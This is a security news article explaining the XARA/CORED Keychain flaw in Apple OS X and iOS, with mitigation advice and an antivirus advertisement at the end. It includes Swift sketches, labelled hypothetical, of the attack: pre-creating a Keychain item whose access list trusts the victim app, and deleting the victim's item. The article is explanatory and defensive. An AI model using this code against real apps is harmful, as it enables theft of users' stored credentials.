Naked Security

Apple OS X and iOS in the vulnerability spotlight – meet “CORED,” also known as “XARA”


The security issue of the week has arrived, and, quelle surprise, it’s attracted a funky name already.

The researchers who wrote it up tried to call it XARA, not least because then they got to call their XARA detection tool by the name XAVUS.

(Geddit? Pronounce “X” in the American style, as if it were “Z”, and make the “A” into a long vowel, not short, and all will be clear.)

But the vulnerabilities they found were part of Apple’s OS X and iOS operating systems, so our friends over at The Register were having none of XARA.

XARA, by the way, stands for Cross-App Resource Access, and one of the main XARA problems that the researchers found was an Elevation of Privilege (EoP) hole that lets app X get unauthorised access to app Y’s entries in the Apple Keychain.

Understanding Keychain

Keychain is the operating system component where things like passwords, security tokens, credential data and other application-specific secrets are stored.

It is deliberately designed to make it difficult for apps to read each other’s private data, even if those apps are processes running under the same user’s account.
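To make that a bit more concrete, here’s a minimal sketch (in Swift, with made-up service and account names) of how an app typically stashes a secret and reads it back using the Security framework’s SecItemAdd and SecItemCopyMatching calls:

```swift
import Foundation
import Security

// Hypothetical identifiers -- a real app would use its own service and account names.
let service = "com.example.SocialNet"
let account = "logincookie"

// Save a secret. By default, only the app that created the item gets to read it back.
func saveSecret(_ secret: String) -> OSStatus {
    let attrs: [String: Any] = [
        kSecClass as String: kSecClassGenericPassword,
        kSecAttrService as String: service,
        kSecAttrAccount as String: account,
        kSecValueData as String: secret.data(using: .utf8)!
    ]
    return SecItemAdd(attrs as CFDictionary, nil)
}

// Retrieve the secret later.
func loadSecret() -> String? {
    let query: [String: Any] = [
        kSecClass as String: kSecClassGenericPassword,
        kSecAttrService as String: service,
        kSecAttrAccount as String: account,
        kSecReturnData as String: true,
        kSecMatchLimit as String: kSecMatchLimitOne
    ]
    var result: AnyObject?
    guard SecItemCopyMatching(query as CFDictionary, &result) == errSecSuccess,
          let data = result as? Data else { return nil }
    return String(data: data, encoding: .utf8)
}
```

The important point is that the operating system, not the app, decides who may read each item back, which is exactly the property the rest of this story is about.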

Historically, software simply stashed its private data in private files in a private directory (or in the registry, which is a special sort of file-and-directory container on Windows), and relied on the operating system’s regular Access Control List (ACL) system to regulate access.

As a result, my apps couldn’t read data from your apps, assuming we were users with different logins on the same computer, which was a good thing.

Of course, that meant my apps could easily plunder each other’s data, on the grounds that it’s my data, so I should have access to it anyway.

But in today’s cloud-based, online world, that can make life much too easy for malware.

If I run a dodgy program and inadvertently give it permission to log in to my Facebook account, the “divide-and-conquer” principle says it is highly desirable that the malicious app can’t casually take over my Twitter, my Snapchat and my Outlook.com accounts as well.

Thus, Keychain: an operating-system level “divide-and-conquer” system for app-specific authentication data.

Keychain serves a similar purpose to the same origin policy in browsers, whereby even though I choose to visit two different sites at the same time, the browser keeps their data separate for my greater safety.

Anyway, with Keychain being the core of Apple’s credential management, and our researchers having found a way to worm their way around in this core component, The Register came up with the name CORED, allowing them to use the headline “Apple CORED.”

So, CORED it is.

How attackers think

The research paper is quite extensive – indeed, we’re still working our way through its details – but the XARA problems in Keychain are perhaps the catchiest of the bunch, and they give a fascinating insight into how attackers think when they’re probing for problems in a security protocol.

What the authors found is a way to exploit the fact that Keychain isn’t quite as simple as “one app, one password storage bucket.”

If that’s how it worked, this bug wouldn’t exist, and Keychain would be easier to test for security correctness.

But software writers would be unhappy, because it would then be impossible for complementary apps to share private data such as account names and login credentials.

So, the researchers realised that they could exploit what is effectively a race condition, where two processes go for a single resource, and if the wrong process gets there first, it can subvert the correct operation of the other.

Winning the race

Let’s say you have an app called SocialNet installed, but you haven’t logged in with it yet, so it hasn’t got around to creating a Keychain entry with your login credentials in it.

When you do log in for the first time, it will create a Keychain item called logincookie, and save its secret data there, where my malware can’t read it without alerting you to the subterfuge, for example by popping up an administrator prompt.

Or so you’d hope.

But in this case, my malware can create its own logincookie, and tell Keychain, “By the way, I trust SocialNet to access this item, too.”

And so, when you get around to logging in with SocialNet, there’s a good chance (unless the programmers of SocialNet decided to watch out for treachery of this sort) that the app will save its login cookie in this already-created Keychain object.

Then, my malware can read it without triggering any sort of alert.
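The research paper has the full details; what follows is just a rough, hypothetical sketch of the sort of thing a rogue OS X app could attempt, using the Security framework’s legacy access-control calls. It is not the researchers’ actual code, and the /Applications/SocialNet.app path and the item names are invented for illustration:

```swift
import Foundation
import Security

// HYPOTHETICAL sketch only (OS X keychain, legacy ACL APIs, names invented):
// a rogue app pre-creates a keychain item and puts the victim app on the
// item's trusted-application list, so the victim can later write into it.

// 1. Build an access object that trusts both this process and the victim app.
var selfApp: SecTrustedApplication?
SecTrustedApplicationCreateFromPath(nil, &selfApp)            // nil = the calling app

var victimApp: SecTrustedApplication?
SecTrustedApplicationCreateFromPath("/Applications/SocialNet.app", &victimApp)

var access: SecAccess?
SecAccessCreate("logincookie" as CFString,
                [selfApp!, victimApp!] as CFArray,
                &access)

// 2. Create the item *before* the victim ever logs in, attaching the permissive ACL.
let attrs: [String: Any] = [
    kSecClass as String: kSecClassGenericPassword,
    kSecAttrService as String: "SocialNet",
    kSecAttrAccount as String: "logincookie",
    kSecValueData as String: "placeholder".data(using: .utf8)!,  // victim later overwrites this
    kSecAttrAccess as String: access!                            // OS X-only attribute
]
let status = SecItemAdd(attrs as CFDictionary, nil)
print("Pre-created keychain item, status = \(status)")

// 3. Once the victim has logged in and saved its cookie into this item, the
//    rogue app can read it back with an ordinary SecItemCopyMatching query,
//    because it is on the item's access list too.
```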

Actually, it’s worse than that, because even if SocialNet has already created its own logincookie, my malware may be able to delete that data without authentication.

Sure, if I keep deleting your login credentials and deauthenticating your app, that could cause a Denial of Service (DoS) problem by decreasing privilege.

But, at a first thought, it feels as though deleting login cookies shouldn’t ever cause an increase in privilege for an unauthorised app.

Except that once I’ve deleted your Keychain item, I open up the race condition by which I can re-create it so that both your app and mine can read it back in future.
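Again purely as an illustration, and reusing the invented names from the sketch above, the deletion step amounts to little more than a SecItemDelete call, after which the rogue app can re-run its pre-creation trick:

```swift
import Foundation
import Security

// HYPOTHETICAL sketch: knock out the victim's existing item, then re-create it
// with a permissive ACL as in the previous snippet.
let query: [String: Any] = [
    kSecClass as String: kSecClassGenericPassword,
    kSecAttrService as String: "SocialNet",
    kSecAttrAccount as String: "logincookie"
]
let status = SecItemDelete(query as CFDictionary)
if status == errSecSuccess {
    // The victim's credentials are gone. The next time it logs the user in,
    // it may happily reuse an attacker-created replacement item.
    // (Re-run the SecAccessCreate/SecItemAdd steps from the sketch above here.)
}
```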

Such are the vagaries and unexpected complexities of security protocols!

Where next?

According to the researchers, who found similar cross-app data leakage issues in other inter-app protocols on OS X and iOS, these problems are part of the operating system core itself, and we shall need an update from Apple to get rid of them for ever.

Alternatively, or additionally, apps can adopt defensive programming tactics to protect themselves against these XARA holes, now that they are known and documented.
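For example, and this is just one hedged possibility rather than an official fix, an app that knows it has never saved any credentials could treat a pre-existing Keychain item bearing its name as suspicious, delete it, and start afresh instead of writing its secrets into it. Here’s a minimal Swift sketch of that idea, with invented function and parameter names:

```swift
import Foundation
import Security

// HYPOTHETICAL defensive sketch: before the very first login, refuse to reuse a
// keychain item that this app never created.
func prepareForFirstLogin(service: String, account: String) {
    let probe: [String: Any] = [
        kSecClass as String: kSecClassGenericPassword,
        kSecAttrService as String: service,
        kSecAttrAccount as String: account,
        kSecReturnAttributes as String: true,
        kSecMatchLimit as String: kSecMatchLimitOne
    ]
    var found: AnyObject?
    if SecItemCopyMatching(probe as CFDictionary, &found) == errSecSuccess {
        // We've never logged in, yet an item with our name already exists:
        // someone else planted it, so delete it rather than trusting it.
        let deleteQuery: [String: Any] = [
            kSecClass as String: kSecClassGenericPassword,
            kSecAttrService as String: service,
            kSecAttrAccount as String: account
        ]
        SecItemDelete(deleteQuery as CFDictionary)
    }
    // When the user really does log in, create a brand-new item, ideally with
    // an access list that trusts only this application.
}
```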

As it happens, according to The Register’s report, the researchers claim to have told Apple more than six months ago, and only decided to publish their research when no mitigation was forthcoming, or even promised, from Cupertino.

The researchers also say they created malware apps that were able to exploit the XARA holes they’d found, and then successfully got them passed by Apple’s vetting process and accepted into the App Store.

What to do?

There isn’t a lot you can do right now.

But the following points can, and should, mitigate the risk:

  • Apple, we hope, is now looking out for apps that use these holes, making it much less likely that malware exploiting them will make it into the App Store again.
  • Untrustworthy apps can already pull off credential-stealing tricks without exploiting components such as Keychain, so keep on using that anti-virus software!
  • Thanks to the report, threat-prevention tools can now detect and block CORED-like behaviour without courting controversy, even if those detections flag problems in otherwise legitimate apps.

You might be surprised to find how tricky it can be, if you’re a security researcher, to add generic detection and blocking of notoriously insecure apps if they seem to have even a shred of legitimacy.

Actually, you probably won’t be surprised.

After all, if we could block risky code entirely on the basis of its risk, without reference to its origin, there wouldn’t be much Windows XP left!

Sophos Anti-Virus for Mac Home Edition

Want to keep an eye out for malware (CORED or not), malicious web links and other threats to your beloved Mac?

Sophos Anti-Virus for Mac Home Edition is 100% free (email address required), with no expiry and no time limit on updates.

Sophos Anti-Virus for Mac also stops threats for Windows, so it even protects non-Mac users you share files with.

Choose from blocking viruses in real time (on-access protection), scanning at scheduled times, or running a check whenever you want.

Click to go to the download page...

Image of apple core courtesy of Shutterstock.